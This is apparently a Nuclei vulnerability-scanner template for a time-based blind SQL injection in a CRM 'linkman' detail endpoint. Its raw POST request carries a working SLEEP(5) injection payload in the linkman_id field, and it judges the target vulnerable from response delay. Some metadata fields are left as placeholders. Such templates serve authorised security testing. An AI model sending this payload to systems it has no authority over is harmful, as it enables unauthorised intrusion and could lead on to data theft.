id: detail_sleep_SQL
info:
  name: detail_sleep_SQL
  author: weehhd
  severity: high
  description: https://blog.csdn.net/qq_41904294/article/details/134675267
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |-
        POST /general/crm/linkman/query/detail.php HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-CN;q=0.8,en;q=0.7
        Cookie: LOGIN_LANG=cn; PHPSESSID=42b93accdd59a4001c07d646bb04ee4d
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 85

        linkman_id=1%20AND%20%28SELECT%205830%20FROM%20%28SELECT%28SLEEP%285%29%29%29mDdD%29
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - HTTP/1.1 302 Found
      - type: dsl
        dsl:
          - 'duration>=5'